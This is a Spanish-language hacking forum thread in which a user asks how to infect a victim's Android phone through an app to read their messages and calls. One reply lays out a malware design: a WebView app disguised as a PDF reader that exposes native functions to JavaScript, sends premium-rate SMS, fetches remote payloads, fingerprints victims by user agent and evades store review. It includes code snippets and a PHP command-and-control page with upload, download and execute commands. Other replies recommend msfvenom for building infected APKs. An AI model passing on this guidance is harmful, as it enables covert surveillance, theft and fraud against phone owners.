elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ¿Hack celular android?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Hack celular android?  (Leído 6,479 veces)
beto1555

Desconectado Desconectado

Mensajes: 20


Ver Perfil
¿Hack celular android?
« en: 18 Enero 2020, 21:33 pm »

Alguien sabe si existe ya un hack para infectar celulares android, que la victima descarge una app y la ejecute? y de ahi quede infectada y pueda ver sus mensajes llamadas etc?
En línea

Machacador


Desconectado Desconectado

Mensajes: 5.029


El original...


Ver Perfil WWW
Re: ¿Hack celular android?
« Respuesta #1 en: 18 Enero 2020, 21:47 pm »

Si hay...

 :rolleyes: :o :rolleyes:
En línea

"Solo tu perro puede admirarte mas de lo que tu te admiras a ti mismo"
beto1555

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: ¿Hack celular android?
« Respuesta #2 en: 18 Enero 2020, 22:40 pm »

Si hay...

 :rolleyes: :o :rolleyes:

Sabes como se llama o si se compra? gracias
En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: ¿Hack celular android?
« Respuesta #3 en: 18 Enero 2020, 23:32 pm »

Alguien sabe si existe ya un hack para infectar celulares android, que la victima descarge una app y la ejecute? y de ahi quede infectada y pueda ver sus mensajes llamadas etc?
https://github.com/StringManolo/SMJSB?files=1

El archivo A.html es una página web de ejemplo. A ti lo que te interesa es la función vibrate:
<script>
function vibrate(milliseconds) {
  Android.Vibrate(milliseconds);
}
</script>
Si el usuario visita esta página web el móvil vibrará. En contreto se lo metí al banner de la web. Cuando el usuario toca con el dedo el rectángulo, este cambia de color y el teléfono vibra.

Esto es posible porque desde java se puede exponer las funciones nativas del sistema.
De la mism forma que vibra, puede enviar un sms, hacer una llamada. Descargarte un exploit, rootear el sistema... Lo que te de la gana que te permita hacer el teléfono. Es todo igual de sencillo.

Qué tipo de malwares puedes desarrollar de un forma muy sencilla técnicamente de esta forma?
Un dialer por ejemplo. Son los típicos que mandan sms a un teléfono de pago subscribiéndose.

Como puedes distribuir la applicación de una forma sencilla y ocultar el código? Puedes utilizar una librería de javascript que lea pdfs. Simplemente sustituyes mi A.html por un archivo con una librería de javascript para leer pdf y le añades la llamada a tu función.
En este caso se llama Android.vibrate(milliseconds) para que sea reconocida pero podrías llamarla a.b(); Lo bueno es que ni siquiera necesitas buildear el proyecto con un html fijo. Simplemente le pones una url a cualquier página pública y lees el contenido. Cuando aparezca la palabra ho1a!!!! en ese sitio, tu código java lo interpreta y manda el sms. O montas una página php y cada persona que visite la página desde tu app, compruebas si es un usuario que infectaste tú, o un random. Si es un random le muestras una web normal. Si es un bot, le añades una llamada a función en medio de la página junto al código del lector del .pdf.
No es nada sofisticado, es todo lo contrario.

En el archivo actividadPrincipal.java tienes simplemente un visor de html con el motor de webkit, como si fuese un navegador. Y se le activa javascript. Así puede ver e interpretar páginas web. Muy útil para usar de bot por si quieres mandar al usuario hacer tareas en páginas con seguridad.

En este archivo te interesan varias cosas.
El userAgent usa uno de un servicio de Google online. Si borras el userAgent utiliza el por defecto del teléfono.
String MiUserAgent = "Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30";
 MiWebView.getSettings().setUserAgentString(MiUserAgent);

Si haces spear delivery puedes editar el userAgent base y añadirle un pequeño cambio para identificarlo cuando visite tu web para mandarle un payload personalizado.

Despues tienes el trozo de código que llama a la interfaz. JSInterfaz estáz definido en otro archivo. "Android" es el nombre de la interfaz. Como te dije puedes llamarle como quieras. Es el identificador que usarás en el javascript de la web. Si vas a hacer un lector de pdf le puede llamar IsPDFOpen para despistar. MiWebView.addJavascriptInterface(new JSInterface(this), "Android");

El último trozo de código de este archivo que te interesa es este:
MiWebView.loadUrl("file:///android_asset/A.html");

Ahora mismo carga la web desde local, asique no necesitas tener acceso a internet para controlar el dispositivo.
Con la el mismo método puedes llamar a cualquier url. Ya sea de tu web o cualquier otra. Como va directa al motor puedes hacer cosas chulas como pasarle scripts directamente, meterle un eval para los parámetros, un uri que realice una descarga automática o el pseudoprotocolo de javacript. Si siquiera necesitas activar javascript para hacer estas cosas. Asique si quieres mayor seguridad puedes harcodear un dominio a la url y pasarle javascript en las respuestas por la url. Como se queda con el mismo document location haces un refresh y ya lo tienes a la escucha de nuevo.

El archivo JSInterfaz.java es super sencillo. Solo tienes que añadir tus funciones debajo de la de vibrate siguiendo el mismo formato.

Por último tienes 2 .xml uno para crear la interfaz, y otro para darle los permisos necesarios a la aplicación.

Esto más que el diseño de un malware, es una applicación diseñada para instalar otro malware. Una vez en el sistema, puede ser codeada para pasar totalmente desapercivida, firmada, subida a la store, etc.

Después desde tu web controlas a quien le das que. No te interesa infectar a los developers de Google que testén tu app. xD

La aplicaciones en Android normalmente necesitan instalaciones muy pesadas para ser desarrolladas. Esta aplicación la puedes crear tal cual usando el Java N-IDE desde tu Android en la playstore. Solo tienes que descargártela, crear un nuevo proyecto Android y añadir estos archivos. Le das a buildear y listo, ya tienes tu .apk para mandar.

Lo tal es que en tu web tengas un php. Algo estilo:
Código
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport'/>
  5. <title>SMZC</title>
  6. </head>
  7. <body>
  8.  <?php
  9.  
  10.    $yourdomain = $_SERVER['HTTP_HOST'];
  11.    $yourdomain = preg_replace('/^www\./' , '' , $yourdomain);
  12.  
  13.    $UserAgent=$_SERVER['HTTP_USER_AGENT'];
  14.    $BotUA = 'zombie';
  15.  
  16.  
  17.  ?>
  18.  
  19. <div id="ContenidoWeb">
  20. <p><h3>Página Web:</h3></p>
  21. <p>
  22.  <?php
  23. if ($UserAgent == $BotUA)
  24. {
  25. echo "Eres un Zombie<br>Comandos:<br>@SubirArchivo<br>@BajarArchivo<br>@EjecutarArchivo";
  26. }
  27.  
  28. else
  29. {
  30. echo "Eres un visitante";
  31.  
  32. }
  33.   ?>
  34. </p>
  35. </div>
  36. </body>
  37. </html>

Obviamente esto es solo un ejemplo.

Esta diseñado para ofrecer servicios customizados a diversos clientes con distintas necesidades sin verse limitado en el desarrollo por la seguridad de los navegadores. A veces los clientes se portan mal y necesitan un castigo :3

En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

BloodSharp


Desconectado Desconectado

Mensajes: 812


¡ Hiperfoco !


Ver Perfil WWW
Re: ¿Hack celular android?
« Respuesta #4 en: 18 Enero 2020, 23:58 pm »

Con msfvenom podés generar o utilizar una apk existente para crear un apk infectado.



B#
« Última modificación: 19 Enero 2020, 01:04 am por BloodSharp » En línea



UnaiiM

Desconectado Desconectado

Mensajes: 151


The art of programming is the skill of controlling


Ver Perfil
Re: ¿Hack celular android?
« Respuesta #5 en: 24 Febrero 2020, 10:48 am »

De toda la vida con el msfvenom se puede crear un apk malicioso. Pero es muy básico y muy fácil de detectar. Si no es un celular el cual tengas acesso físico y este tenga una penosa seguridad pues poco te va a servir la apk.... O eso creo yo xd. :o
Saludos!

PD: muy buena aportación por parte de Manolo.
En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: ¿Hack celular android?
« Respuesta #6 en: 24 Febrero 2020, 14:29 pm »

Sin hacerlo FUD creo yo que el PGP te chapa el .apk aunque no quieras.
Le hice reversing a un .apk que generé con msfvenom y tiene clases que se llaman metasploit :xD Si no lo ofuscas no te vale ni para testear en local. O al menos a mi no me conecta de vuelta ni enviando un "hola" por http a dirección local.

Igual también es tema de versiones, o ve tu a saber.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

BloodSharp


Desconectado Desconectado

Mensajes: 812


¡ Hiperfoco !


Ver Perfil WWW
Re: ¿Hack celular android?
« Respuesta #7 en: 24 Febrero 2020, 17:39 pm »

Igual también es tema de versiones, o ve tu a saber.

A mi me funcionó perfectamente con mi viejo telefono con Android 6, por eso puse la imagen arriba ya infectado...


B#
En línea



@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: ¿Hack celular android?
« Respuesta #8 en: 24 Febrero 2020, 18:50 pm »

A mi me funcionó perfectamente con mi viejo telefono con Android 6, por eso puse la imagen arriba ya infectado...


B#
Yo probé con 4.4.4 y nada. Necesita root o algo?
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

nightcode

Desconectado Desconectado

Mensajes: 216


Hackea el sistema, Hackea el Mundo,


Ver Perfil
Re: ¿Hack celular android?
« Respuesta #9 en: 29 Agosto 2020, 03:08 am »

Si hay y puedes mirar los videos en youtube.
En línea

“Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
cuanto pide android en un celular?
Android
flacc 2 5,272 Último mensaje 4 Abril 2011, 03:36 am
por Nakp
Ayuda Hack juegos Java Para Celular Movil
Juegos y Consolas
Leesduk 1 5,223 Último mensaje 13 Mayo 2015, 07:01 am
por engel lex
Hack android sin instalar apk
Hacking Mobile
taku 0 6,396 Último mensaje 26 Agosto 2016, 20:04 pm
por taku
Android WPS hack avanzado
Hacking Wireless
Maikel 1 4,527 Último mensaje 17 Enero 2017, 07:38 am
por Sh4k4
Top de app o programa hack para android
Dispositivos Móviles (PDA's, Smartphones, Tablets)
Nickov 2 3,332 Último mensaje 27 Febrero 2020, 06:57 am
por BloodSharp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines